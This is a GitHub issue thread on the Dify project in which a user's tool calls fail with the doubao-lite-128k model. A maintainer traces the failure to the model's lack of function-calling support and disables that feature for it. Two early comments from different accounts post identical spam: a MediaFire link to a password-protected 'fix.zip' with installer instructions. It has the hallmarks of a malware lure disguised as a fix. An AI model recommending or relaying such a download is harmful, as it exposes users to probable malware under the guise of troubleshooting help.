### ISSUE TITLE
doubao tools call error

### ISSUE THREAD

**Issue by kenneth-bro** [langgenius/dify#7669]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.2

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

model doubao-lite-128K, agent mode + use tools
error
``` text
One or more parameters specified in the request are not valid
```

![image](https://github.com/user-attachments/assets/c702d2d8-f694-4a05-8ba7-ff329672ebc5)

![image](https://github.com/user-attachments/assets/93ef77a5-3749-403d-81ae-064222801a5a)

### ✔️ Expected Behavior

1、config model doubao-lite-128k
2、create agent
3、config tools
4、input question

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sinomoe** [comment]
@kenneth-bro could you provide the schema for your tools' parameters?

**Comment by kenneth-bro** [comment]
> @kenneth-bro could you provide the schema for your tools' parameters?

``` json
{
    "openapi": "3.0.0",
    "info": {
        "title": "创建图表",
        "description": "生成条形图、折线图、饼图、雷达图等数据图表。",
        "version": "1.0.0"
    },
    "servers": [
        {
            "url": "https://quickchart.io"
        }
    ],
    "paths": {
        "/chart/create": {
            "post": {
                "operationId": "create_data_chart",
                "description": "绘制直方图、折线图、雷达图、饼图等数据图表。调用此方法前先根据用户需求调用code能力生成chart.js规范的json数据，然后将该值作为入参chart传入到模型。得到返回结果后，需要用Markdown格式加载图片URL来显示图片，不要显示为下载链接",
                "tags": [
                    "图表"
                ],
                "requestBody": {
                    "required": true,
                    "content": {
                        "application/json": {
                            "schema": {
                                "type": "object",
                                "properties": {
                                    "width": {
                                        "type": "string",
                                        "description": "图表的像素宽度"
                                    },
                                    "height": {
                                        "type": "string",
                                        "description": "图表的像素高度"
                                    },
                                    "backgroundColor": {
                                        "type": "string",
                                        "description": "RGB、HEX、HSL或颜色名称。默认为transparent"
                                    },
                                    "chart": {
                                        "description": "输入要渲染的Chart.js配置信息的json的值，必须传入具体值，不要传入变量名。",
                                        "example": " {   \"type\": \"bar\",   \"data\": {     \"labels\": [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\"],     \"datasets\": [       {         \"type\": \"line\",         \"label\": \"Dataset 1\",         \"borderColor\": \"rgb(54, 162, 235)\",         \"borderWidth\": 2,         \"fill\": false,         \"data\": [-33, 26, 29, 89, -41, 70, -84]       },       {         \"label\": \"Dataset 2\",         \"backgroundColor\": \"rgb(255, 99, 132)\",         \"data\": [-42, 73, -69, -94, -81, 18, 87],         \"borderColor\": \"white\",         \"borderWidth\": 2       },       {         \"label\": \"Dataset 3\",         \"backgroundColor\": \"rgb(75, 192, 192)\",         \"data\": [93, 60, -15, 77, -59, 82, -44]       }     ]   },   \"options\": {     \"title\": {       \"display\": true,       \"text\": \"My chart\"     }   } }",
                                        "type": "string"
                                    }
                                }
                            }
                        }
                    }
                },
                "responses": {
                    "200": {
                        "description": "图表创建成功",
                        "content": {
                            "application/json": {
                                "schema": {
                                    "type": "object",
                                    "properties": {
                                        "success": {
                                            "type": "boolean",
                                            "description": "操作是否成功"
                                        },
                                        "url": {
                                            "type": "string",
                                            "description": "生成图表的链接地址"
                                        }
                                    }
                                }
                            }
                        }
                    },
                    "400": {
                        "description": "请求无效"
                    }
                }
            }
        }
    }
}
```

@sinomoe

**Comment by sinomoe** [comment]
> > @kenneth-bro could you provide the schema for your tools' parameters?
> 
> ```json
> {
>     "openapi": "3.0.0",
>     "info": {
>         "title": "创建图表",
>         "description": "生成条形图、折线图、饼图、雷达图等数据图表。",
>         "version": "1.0.0"
>     },
>     "servers": [
>         {
>             "url": "https://quickchart.io"
>         }
>     ],
>     "paths": {
>         "/chart/create": {
>             "post": {
>                 "operationId": "create_data_chart",
>                 "description": "绘制直方图、折线图、雷达图、饼图等数据图表。调用此方法前先根据用户需求调用code能力生成chart.js规范的json数据，然后将该值作为入参chart传入到模型。得到返回结果后，需要用Markdown格式加载图片URL来显示图片，不要显示为下载链接",
>                 "tags": [
>                     "图表"
>                 ],
>                 "requestBody": {
>                     "required": true,
>                     "content": {
>                         "application/json": {
>                             "schema": {
>                                 "type": "object",
>                                 "properties": {
>                                     "width": {
>                                         "type": "string",
>                                         "description": "图表的像素宽度"
>                                     },
>                                     "height": {
>                                         "type": "string",
>                                         "description": "图表的像素高度"
>                                     },
>                                     "backgroundColor": {
>                                         "type": "string",
>                                         "description": "RGB、HEX、HSL或颜色名称。默认为transparent"
>                                     },
>                                     "chart": {
>                                         "description": "输入要渲染的Chart.js配置信息的json的值，必须传入具体值，不要传入变量名。",
>                                         "example": " {   \"type\": \"bar\",   \"data\": {     \"labels\": [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\"],     \"datasets\": [       {         \"type\": \"line\",         \"label\": \"Dataset 1\",         \"borderColor\": \"rgb(54, 162, 235)\",         \"borderWidth\": 2,         \"fill\": false,         \"data\": [-33, 26, 29, 89, -41, 70, -84]       },       {         \"label\": \"Dataset 2\",         \"backgroundColor\": \"rgb(255, 99, 132)\",         \"data\": [-42, 73, -69, -94, -81, 18, 87],         \"borderColor\": \"white\",         \"borderWidth\": 2       },       {         \"label\": \"Dataset 3\",         \"backgroundColor\": \"rgb(75, 192, 192)\",         \"data\": [93, 60, -15, 77, -59, 82, -44]       }     ]   },   \"options\": {     \"title\": {       \"display\": true,       \"text\": \"My chart\"     }   } }",
>                                         "type": "string"
>                                     }
>                                 }
>                             }
>                         }
>                     }
>                 },
>                 "responses": {
>                     "200": {
>                         "description": "图表创建成功",
>                         "content": {
>                             "application/json": {
>                                 "schema": {
>                                     "type": "object",
>                                     "properties": {
>                                         "success": {
>                                             "type": "boolean",
>                                             "description": "操作是否成功"
>                                         },
>                                         "url": {
>                                             "type": "string",
>                                             "description": "生成图表的链接地址"
>                                         }
>                                     }
>                                 }
>                             }
>                         }
>                     },
>                     "400": {
>                         "description": "请求无效"
>                     }
>                 }
>             }
>         }
>     }
> }
> ```
> 
> @sinomoe

Please disable all tools, then enable each tool one by one and conduct a conversation test. Once an error occurs, show me the schema of the tool that caused the error.

**Comment by kenneth-bro** [comment]
> > > @kenneth-bro could you provide the schema for your tools' parameters?您能提供工具参数的架构吗？
> > 
> > 
> > ```json
> > {
> >     "openapi": "3.0.0",
> >     "info": {
> >         "title": "创建图表",
> >         "description": "生成条形图、折线图、饼图、雷达图等数据图表。",
> >         "version": "1.0.0"
> >     },
> >     "servers": [
> >         {
> >             "url": "https://quickchart.io"
> >         }
> >     ],
> >     "paths": {
> >         "/chart/create": {
> >             "post": {
> >                 "operationId": "create_data_chart",
> >                 "description": "绘制直方图、折线图、雷达图、饼图等数据图表。调用此方法前先根据用户需求调用code能力生成chart.js规范的json数据，然后将该值作为入参chart传入到模型。得到返回结果后，需要用Markdown格式加载图片URL来显示图片，不要显示为下载链接",
> >                 "tags": [
> >                     "图表"
> >                 ],
> >                 "requestBody": {
> >                     "required": true,
> >                     "content": {
> >                         "application/json": {
> >                             "schema": {
> >                                 "type": "object",
> >                                 "properties": {
> >                                     "width": {
> >                                         "type": "string",
> >                                         "description": "图表的像素宽度"
> >                                     },
> >                                     "height": {
> >                                         "type": "string",
> >                                         "description": "图表的像素高度"
> >                                     },
> >                                     "backgroundColor": {
> >                                         "type": "string",
> >                                         "description": "RGB、HEX、HSL或颜色名称。默认为transparent"
> >                                     },
> >                                     "chart": {
> >                                         "description": "输入要渲染的Chart.js配置信息的json的值，必须传入具体值，不要传入变量名。",
> >                                         "example": " {   \"type\": \"bar\",   \"data\": {     \"labels\": [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\"],     \"datasets\": [       {         \"type\": \"line\",         \"label\": \"Dataset 1\",         \"borderColor\": \"rgb(54, 162, 235)\",         \"borderWidth\": 2,         \"fill\": false,         \"data\": [-33, 26, 29, 89, -41, 70, -84]       },       {         \"label\": \"Dataset 2\",         \"backgroundColor\": \"rgb(255, 99, 132)\",         \"data\": [-42, 73, -69, -94, -81, 18, 87],         \"borderColor\": \"white\",         \"borderWidth\": 2       },       {         \"label\": \"Dataset 3\",         \"backgroundColor\": \"rgb(75, 192, 192)\",         \"data\": [93, 60, -15, 77, -59, 82, -44]       }     ]   },   \"options\": {     \"title\": {       \"display\": true,       \"text\": \"My chart\"     }   } }",
> >                                         "type": "string"
> >                                     }
> >                                 }
> >                             }
> >                         }
> >                     }
> >                 },
> >                 "responses": {
> >                     "200": {
> >                         "description": "图表创建成功",
> >                         "content": {
> >                             "application/json": {
> >                                 "schema": {
> >                                     "type": "object",
> >                                     "properties": {
> >                                         "success": {
> >                                             "type": "boolean",
> >                                             "description": "操作是否成功"
> >                                         },
> >                                         "url": {
> >                                             "type": "string",
> >                                             "description": "生成图表的链接地址"
> >                                         }
> >                                     }
> >                                 }
> >                             }
> >                         }
> >                     },
> >                     "400": {
> >                         "description": "请求无效"
> >                     }
> >                 }
> >             }
> >         }
> >     }
> > }
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > @sinomoe
> 
> Please disable all tools, then enable each tool one by one and conduct a conversation test. Once an error occurs, show me the schema of the tool that caused the error.请禁用所有工具，然后逐一启用每个工具并进行会话测试。一旦发生错误，请显示导致错误的工具的架构。

there are enabled one tool only, but the error is always to show. you can try.

**Comment by sinomoe** [comment]
I can't reproduce your error, could you check your model parameters? is max_tokens bigger than 4096?
![image](https://github.com/user-attachments/assets/1c869d6e-1737-4503-92d5-3f176f713c20)

**Comment by kenneth-bro** [comment]
> I can't reproduce your error, could you check your model parameters? is max_tokens bigger than 4096?我无法重现您的错误，您能检查一下您的模型参数吗？ max_tokens 是否大于 4096？ <img alt="image" width="536" src="https://private-user-images.githubusercontent.com/18367114/361665701-331ef92f-26f4-4331-a208-dfe42b6ad403.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3Mzc0ODYsIm5iZiI6MTcyNDczNzE4NiwicGF0aCI6Ii8xODM2NzExNC8zNjE2NjU3MDEtMzMxZWY5MmYtMjZmNC00MzMxLWEyMDgtZGZlNDJiNmFkNDAzLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA1Mzk0NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTVlZWZmOTJlZTg0ZmNmYWMxNjBiYTdjNTc4NmFkYWNhMzk2OTk2NGFjOTdhMTY1YWUzNDI3M2QwY2MzMjQzMTYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.WFZB5WqA-mgqJ-sawQ0X7hMRQ5ay-XO-j2ELX6VtDoE"> @kenneth-bro

it's default params on model
![image](https://github.com/user-attachments/assets/739abb50-d241-4f56-804c-54fce3cac03f)

**Comment by kenneth-bro** [comment]
please try the model doubao-lite-128k, may be this cause.

**Comment by sinomoe** [comment]
It appears to be an error caused by ARK. I tested with doubao-lite-32k, doubao-lite-128k, and doubao-pro-4k. The error only occurred with doubao-lite-128k. You may want to consider reaching out to Volcengine's customer service for assistance. @kenneth-bro

**Comment by sinomoe** [comment]
![image](https://github.com/user-attachments/assets/0d443c5a-152a-4074-b3c2-eb1e69fca917)

According to the official documentation, doubao-lite-128k does not support FC. Therefore, I will disable FC support for doubao-lite-128k.

@kenneth-bro

**Comment by sinomoe** [comment]
@crazywoola ready for reviewing #7666

**Comment by kenneth-bro** [comment]
> <img alt="image" width="792" src="https://private-user-images.githubusercontent.com/18367114/361671370-0b2bc54a-4741-44eb-93a7-0b8762e93564.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3Mzg2ODMsIm5iZiI6MTcyNDczODM4MywicGF0aCI6Ii8xODM2NzExNC8zNjE2NzEzNzAtMGIyYmM1NGEtNDc0MS00NGViLTkzYTctMGI4NzYyZTkzNTY0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA1NTk0M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWU3YzM4ODcxODY5ZTc1OWE2YWUxZjA4YmFjNjk4MTgwOGE5ZmFiNTU0Yjk3ZGExNDA2OTdlZjY0N2M4YzAwNzkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.e8vYWIoHE6TjRoiMSVc-8zskNz6fgq5yUNz-SnQdyB4">
> According to the official documentation, doubao-lite-128k does not support FC. Therefore, I will disable FC support for doubao-lite-128k.根据官方文档，doubao-lite-128k不支持FC。因此，我将禁用doubao-lite-128k的FC支持。
> 
> @kenneth-bro

understand.
